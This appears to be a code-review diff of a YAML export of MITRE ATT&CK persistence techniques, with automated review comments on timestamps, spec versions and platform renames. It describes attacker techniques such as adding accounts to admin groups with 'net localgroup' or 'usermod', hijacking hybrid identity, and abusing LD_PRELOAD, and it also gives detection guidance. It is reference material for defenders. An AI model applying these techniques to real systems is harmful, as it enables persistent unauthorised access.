- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
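Review bot: the `x_mitre_detection` text removed in this hunk (the PowerShell script for mail forwarding rules and custom forms, MFCMapi, SensePost's NotRuler, abnormal Office process trees) is Outlook/Office Application Startup detection guidance, not T1098.007 content; git has paired two different attack-pattern objects because the map keys were reordered. Check that this text still appears under its own technique after the patch rather than being dropped. Also, the new T1098.007 block goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier: T1098.007` line, whereas the neighbouring sub-technique entries (T1546.011, T1547.010) carry `identifier:` immediately before `atomic_tests:`; if the generator emits it for other sub-techniques it should emit it here too.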
@@ -29567,7 +30001,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
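Review bot: `modified` moves backwards here ('2022-04-25T14:00:00.188Z' to '2020-11-10T18:29:31.094Z'), and the same backward move appears in several later hunks of this patch (T1037.002, T1205, T1525, T1547.005, T1546.005, T1546.012, T1574.005, T1542.002). If the new values are the upstream STIX `modified` timestamps replacing locally generated ones, say so in the commit message; a consumer that sorts or caches on `modified` will otherwise treat these entries as older than the versions it already holds.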
@@ -29622,13 +30056,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
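Review bot: dropping both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1546.011 leaves that object with no ATT&CK spec version marker at all, whereas other objects in this patch keep or re-add `x_mitre_attack_spec_version` when `spec_version` is removed (T1547.010 in the next hunk retains 3.2.0). The same double removal recurs for T1525, T1547.005, T1546.005, T1546.012, T1574.005 and T1542.002, i.e. the entries that still carry `x_mitre_permissions_required`. If the generator now only emits `x_mitre_attack_spec_version` when upstream supplies it, state that in the commit message; otherwise verify the key is not missing from these objects by accident.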
@@ -29689,9 +30121,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29700,7 +30132,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29753,7 +30184,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29774,12 +30205,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29863,11 +30293,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29880,7 +30309,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -29893,7 +30321,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -29923,7 +30350,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -29955,7 +30383,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29977,8 +30405,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30004,7 +30430,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30030,36 +30456,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
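Review bot: the Azure AD to Entra ID rename is applied to the prose only, leaving the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` keys untouched, which is correct since those must match `source_name` under `external_references`. Anyone tempted to also fix the `Read Teamers` spelling in that citation key must change the matching `source_name` in the same commit, or the citation will dangle. The backticked `AzureADConnectAuthenticationAgentService` is a service name and rightly stays as-is.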
@@ -30067,9 +30491,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30078,21 +30502,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
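Review bot: `x_mitre_platforms` for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped 1.0 to 1.1, and the same consolidation is applied to T1078.001 (version 1.3 to 1.4) and T1137.001 later in the patch. Any per-platform index or filter this repository derives from the old platform names needs regenerating in the same change, or these techniques silently fall out of it; the commit message should call out the platform-model change explicitly rather than leaving it to be inferred from the diff.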
@@ -30132,13 +30557,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
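Review bot: the unchanged context lines here show the Launch Daemon description broken across lines where inline code markup was stripped (`/System/Library/LaunchDaemons/` / `and /Library/LaunchDaemons/` / `. Required Launch Daemons parameters include a Label` / `to identify the task, Program`), and the same artefact appears in the Trap description (`ctrl+c` / `and ctrl+d` / `.`) and the IFEO description (`C:\dbg\ntsd.exe -g notepad.exe` / `). (Citation: Microsoft Dev Blog IFEO Mar 2010)`) further down. Not introduced by this patch, but the stray newlines become part of the YAML block-scalar content, so the generator's handling of inline code spans deserves a follow-up issue.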
@@ -30215,12 +30637,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30239,6 +30660,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30246,7 +30668,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30266,29 +30687,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
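Review bot: the `Microsoft CreateProcess` and `Microsoft WinExec` citations are refreshed to learn.microsoft.com URLs with 'Retrieved September 12, 2024', matching the new `modified` date, while `Windows NT Command Shell` and `Microsoft Environment Property` are only reordered and keep their docs.microsoft.com previous-versions URLs and 2014/2016 retrieval dates, so the link refresh is partial. That is fine if it mirrors upstream, but the reorder plus selective refresh reads like a content edit in the diff; a sentence in the commit message saying the reference list is a regenerated export would save reviewers from checking each entry.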
@@ -30365,12 +30788,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30385,6 +30807,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30393,18 +30816,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -30436,9 +30859,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30510,7 +30930,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30537,7 +30956,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30563,13 +30982,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -30690,7 +31107,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30762,7 +31178,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -30832,7 +31247,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -30942,7 +31356,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -30996,7 +31409,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
